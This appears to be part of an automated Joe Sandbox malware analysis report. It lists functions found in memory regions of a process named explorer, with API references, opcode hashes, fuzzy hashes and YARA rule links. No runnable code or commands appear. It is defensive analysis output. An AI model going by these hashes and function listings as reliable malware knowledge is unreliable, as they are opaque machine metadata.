                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3554981057-0
                                                                                                                                                                                                                          • Opcode ID: 84ba2e8ffa8c070f8bcb12fe5a57611d4ad0a367bfcb76aaba1e21ae4451d5bc
                                                                                                                                                                                                                          • Instruction ID: 2a3ada22bb152ae5bfc4b74b6b90c683415694b1f2b60ad1a5252b210f174ec6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84ba2e8ffa8c070f8bcb12fe5a57611d4ad0a367bfcb76aaba1e21ae4451d5bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3641D472614BA4C6EB21DF22E85476E76A1F344BC0F418426DE9A9376AFF7DC484CB40
                                                                                                                                                                                                                          Function 08B90220 Relevance: 12.6, APIs: 10, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2288870239-0
                                                                                                                                                                                                                          • Opcode ID: 3b725809f783826f38bf764d86fb1a527edf3763737b9a1c545297cb61edb90e
                                                                                                                                                                                                                          • Instruction ID: d54da3df8228289aee10ddd8974835f21515978436aaf3937ac151b49d9d4a5d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b725809f783826f38bf764d86fb1a527edf3763737b9a1c545297cb61edb90e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2311966211E45C2FF54EB52E8A03683BA4FF88B9AF0C96B5C99E0A665DF7CC0458311
                                                                                                                                                                                                                          Function 0E8D4457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 0E8D4482
                                                                                                                                                                                                                          • RaiseException.KERNEL32 ref: 0E8D44AB
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 0E8D450C
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8D445F
                                                                                                                                                                                                                            • Part of subcall function 0E8D23AC: _getptd_noexit.LIBCMT ref: 0E8D23B2
                                                                                                                                                                                                                            • Part of subcall function 0E8D23AC: _amsg_exit.LIBCMT ref: 0E8D23C2
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8D4511
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8D451D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                          • Opcode ID: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
                                                                                                                                                                                                                          • Instruction ID: 5f5ebcb70e8d946b35745f567b27d442eb118493cb0a5e304f1a099cf89d6478
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0214F7620868487C730DF56F44035E77B1F389BA4F044625CF9A87BA4CB38D88ACB11
                                                                                                                                                                                                                          Function 0E8CD548 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8CD565
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8CD55A
                                                                                                                                                                                                                            • Part of subcall function 0E8CF4B0: _getptd_noexit.LIBCMT ref: 0E8CF4B4
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E8CD5AD
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8CD5BC
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8CD5C7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 781512312-0
                                                                                                                                                                                                                          • Opcode ID: 2adfcd022b29f4b069232f6deb85f175021a57b4f4bffe649ae13fab967bf34b
                                                                                                                                                                                                                          • Instruction ID: 3bbe96d7a20448da45c6ceb8a5b07b3a92b381cf4aa3ae6a0d2b00fb87cc3c51
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2adfcd022b29f4b069232f6deb85f175021a57b4f4bffe649ae13fab967bf34b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8210A627057C083DF207BA9959432A67E0A7867A8F544639EA69C7BC8DE7CCD41CB01
                                                                                                                                                                                                                          Function 08B8C948 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B8C965
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B8C95A
                                                                                                                                                                                                                            • Part of subcall function 08B8E8B0: _getptd_noexit.LIBCMT ref: 08B8E8B4
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08B8C9AD
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B8C9BC
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B8C9C7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 781512312-0
                                                                                                                                                                                                                          • Opcode ID: b6d58ceee801837aff8f69e59bdd2d4c32ffc9275c2499d09e72a805d279f6be
                                                                                                                                                                                                                          • Instruction ID: 4a1201ddfcf926ede37237eacec549ee86c7df0b79cef143e705503b7e24b50f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d58ceee801837aff8f69e59bdd2d4c32ffc9275c2499d09e72a805d279f6be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8210AA27043C0C2DFA17765D4A433E6A60F7847E2F5442E5EAA917788CF6CC542CB20
                                                                                                                                                                                                                          Function 0E8C5CE0 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2370468470-0
                                                                                                                                                                                                                          • Opcode ID: a9b2bc6439203cc7de76eeccd1541f13a5137cb49eb13da4fc8e40e5f86a03cf
                                                                                                                                                                                                                          • Instruction ID: 1ca513c65ca27e2dc3b5bb48a31449274a404c2e61b0835a4afce2000667cfbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9b2bc6439203cc7de76eeccd1541f13a5137cb49eb13da4fc8e40e5f86a03cf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D116D21604B808ADB549F62E85436AA3A5FB89FD4F188835DE8A93B59DF3CD0408B00
                                                                                                                                                                                                                          Function 0E8C5910 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3301496367-0
                                                                                                                                                                                                                          • Opcode ID: b70de2df8b5ea13def80164eecd6f5795553ba9fb1e5a8158d6ae8a0e833ed02
                                                                                                                                                                                                                          • Instruction ID: c61f71e41047ea718bc46698c9b4569e1ee77ece0ada83a5a86053035b376f37
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b70de2df8b5ea13def80164eecd6f5795553ba9fb1e5a8158d6ae8a0e833ed02
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D31BC36714B808ADA10CF66E84435AB7A1F789BC4F849429EF8E93B18DF3DD084CB00
                                                                                                                                                                                                                          Function 0E8DB9A0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8DB9CB
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8DB9C0
                                                                                                                                                                                                                            • Part of subcall function 0E8CF4B0: _getptd_noexit.LIBCMT ref: 0E8CF4B4
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8DBA6E
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8DBA79
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1573762532-0
                                                                                                                                                                                                                          • Opcode ID: 1a03224bb8ec9250c7319079b46cbc1d11abc68a3d1d091dd8c51d37480d4c9a
                                                                                                                                                                                                                          • Instruction ID: ac43daf6a2f6ac31d9b59c14c6b55b283dd087dec63ebd1e41b39d042aef99f4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a03224bb8ec9250c7319079b46cbc1d11abc68a3d1d091dd8c51d37480d4c9a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05415472B1A6D582DF249B1695502BA73A0F740BD5FCA4116DB95D76C8DB38CD49C300
                                                                                                                                                                                                                          Function 08B9ADA0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B9ADCB
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B9ADC0
                                                                                                                                                                                                                            • Part of subcall function 08B8E8B0: _getptd_noexit.LIBCMT ref: 08B8E8B4
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B9AE6E
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B9AE79
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1573762532-0
                                                                                                                                                                                                                          • Opcode ID: 7b0bc5d5922d1f0b486ee26f59a6a1fc4df732259cf4d008f6642b23cd42d3f4
                                                                                                                                                                                                                          • Instruction ID: ee705bbe90c6c5a55f25c03a773e9021f533a16e2ddc55aa7039f5c0fd865203
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b0bc5d5922d1f0b486ee26f59a6a1fc4df732259cf4d008f6642b23cd42d3f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 204106B6A106B5C2DF34AB1591402BD7760F740BD7BA8A1B9EFE557784DB38C152C340
                                                                                                                                                                                                                          Function 0E8D76F8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8D771E
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8D7713
                                                                                                                                                                                                                            • Part of subcall function 0E8CF4B0: _getptd_noexit.LIBCMT ref: 0E8CF4B4
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E8D779D
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8D77AE
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8D77B9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 781512312-0
                                                                                                                                                                                                                          • Opcode ID: dbc648b1f4bc8b06f77f9a657a40850ba1d35854beab1e5c2e07f06a5c1227d0
                                                                                                                                                                                                                          • Instruction ID: 3a3b42612fb3179deedc9950f4553172c14a73f492071da6237c18b599dacdaf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbc648b1f4bc8b06f77f9a657a40850ba1d35854beab1e5c2e07f06a5c1227d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71317972A186A182DF24AB1A91502BD33A0F740BF9BC4452BDBD8C77C8DB2ACD59C700
                                                                                                                                                                                                                          Function 08B96AF8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B96B1E
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B96B13
                                                                                                                                                                                                                            • Part of subcall function 08B8E8B0: _getptd_noexit.LIBCMT ref: 08B8E8B4
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08B96B9D
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B96BAE
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B96BB9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 781512312-0
                                                                                                                                                                                                                          • Opcode ID: 45ae6b8eb7bddcd1aaf1248ec0fc3f7063edf7fb5169375d5b57e009c998ba17
                                                                                                                                                                                                                          • Instruction ID: fd59557d41b252ebf89d7eb8d40df176a77b9d98fc08a0ebcfb08f27c80cdba0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45ae6b8eb7bddcd1aaf1248ec0fc3f7063edf7fb5169375d5b57e009c998ba17
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9314772A146A1C2DF24AB1695512BD33B0E761BE3B94417EEBD407B84FB28C556C700
                                                                                                                                                                                                                          Function 08B93857 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 08B93882
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 08B9390C
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B9385F
                                                                                                                                                                                                                            • Part of subcall function 08B917AC: _getptd_noexit.LIBCMT ref: 08B917B2
                                                                                                                                                                                                                            • Part of subcall function 08B917AC: _amsg_exit.LIBCMT ref: 08B917C2
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B93911
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B9391D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 331613561-1018135373
                                                                                                                                                                                                                          • Opcode ID: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
                                                                                                                                                                                                                          • Instruction ID: b1e61a292d235fac89c353ccd2dcfcbabe349668acf8fe8843011af9cea261d6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B214C7B204685C6DA30DF56E48036EB7A0F388BA6F058266CFDA07B54CB3DD486CB10
                                                                                                                                                                                                                          Function 08B7C2D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 08B7C2E9
                                                                                                                                                                                                                            • Part of subcall function 08B8B790: _lock.LIBCMT ref: 08B8B7A2
                                                                                                                                                                                                                            • Part of subcall function 08B7DB40: std::_Lockit::_Lockit.LIBCPMT ref: 08B7DB56
                                                                                                                                                                                                                            • Part of subcall function 08B7DB40: std::_Lockit::~_Lockit.LIBCPMT ref: 08B7DB79
                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 08B7C34E
                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 08B7C358
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 08B7C37C
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B7C38D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • : The expression contained mismatched [ and ]., xrefs: 08B7C370
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: : The expression contained mismatched [ and ].
                                                                                                                                                                                                                          • API String ID: 885392049-2484396094
                                                                                                                                                                                                                          • Opcode ID: f7786013f5cd33757e87bfec871b2f1cb24b3109d5a916a062dc856c4de14913
                                                                                                                                                                                                                          • Instruction ID: d646e303fe9bb26795dfc721b983eba546480b209486e4101385f2b96b602679
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7786013f5cd33757e87bfec871b2f1cb24b3109d5a916a062dc856c4de14913
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6114C26304B4481DE00FB26E85036AB761F789BE5F8882659AAD07BA8DF7CC546C700
                                                                                                                                                                                                                          Function 08B7C3A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 08B7C3B9
                                                                                                                                                                                                                            • Part of subcall function 08B8B790: _lock.LIBCMT ref: 08B8B7A2
                                                                                                                                                                                                                            • Part of subcall function 08B7DB40: std::_Lockit::_Lockit.LIBCPMT ref: 08B7DB56
                                                                                                                                                                                                                            • Part of subcall function 08B7DB40: std::_Lockit::~_Lockit.LIBCPMT ref: 08B7DB79
                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 08B7C41E
                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 08B7C428
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 08B7C44C
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B7C45D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • : The expression contained mismatched [ and ]., xrefs: 08B7C440
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: : The expression contained mismatched [ and ].
                                                                                                                                                                                                                          • API String ID: 885392049-2484396094
                                                                                                                                                                                                                          • Opcode ID: 8dc41d5dbb65d61d7cc90533f1c3d6d8eef9333a717630de676929cf2e46a118
                                                                                                                                                                                                                          • Instruction ID: 2ce78f61aee76a61a12c04cc3a0597aefcdeb9fc7592c27d266a02f705895a53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dc41d5dbb65d61d7cc90533f1c3d6d8eef9333a717630de676929cf2e46a118
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD115E26304F45C1DE10EB26E45036AB761FB88BE5F9882A5DAAD07BA8DF7CC146C700
                                                                                                                                                                                                                          Function 0E8C9FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 3721439000-109466966
                                                                                                                                                                                                                          • Opcode ID: add457e1e98920d2760c7c05102d119e105337da01049b787e53bb3b1fde5219
                                                                                                                                                                                                                          • Instruction ID: 35bebd6fee72b9b7def2b0239b3424501e9ab73b507dcf155ef0a83e6523333c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: add457e1e98920d2760c7c05102d119e105337da01049b787e53bb3b1fde5219
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2119622214A8892DA20DB29E49436E73A5FBCA3D4F804A15DA9DC7798DF3CCD09CB01
                                                                                                                                                                                                                          Function 0E8D4554 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd
                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                          • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                          • Opcode ID: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                                                                          • Instruction ID: ee92bd6febfd73e4ed094eef90ca1143c37f07dcf65417cc70cfdea95ac6f82e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95E06D36508108C7C7296BA984043AC33B0E798705F9688B18621C3360C7BC8C998A23
                                                                                                                                                                                                                          Function 08B93954 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd
                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                          • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                          • Opcode ID: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                                                                          • Instruction ID: 3208466b18929954b3941dfe206e4fd955420b2fe2039b12e037473a6cc27bdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
